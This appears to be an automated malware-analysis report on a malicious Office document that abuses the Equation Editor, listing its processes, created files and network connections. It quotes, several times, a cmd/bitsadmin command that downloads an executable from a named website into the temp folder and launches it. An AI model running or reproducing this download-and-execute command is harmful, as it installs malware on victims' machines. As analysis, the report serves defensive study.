Technical Information
Malicious functions
Executes the following (exploit)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{813bbe3c-4390-47f7-ab0a-3ba6ae576237}.tmp
Network activity
Connects to
- 'go###tula.com':443
UDP
- DNS ASK go###tula.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe' (with hidden window)
Executes the following
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
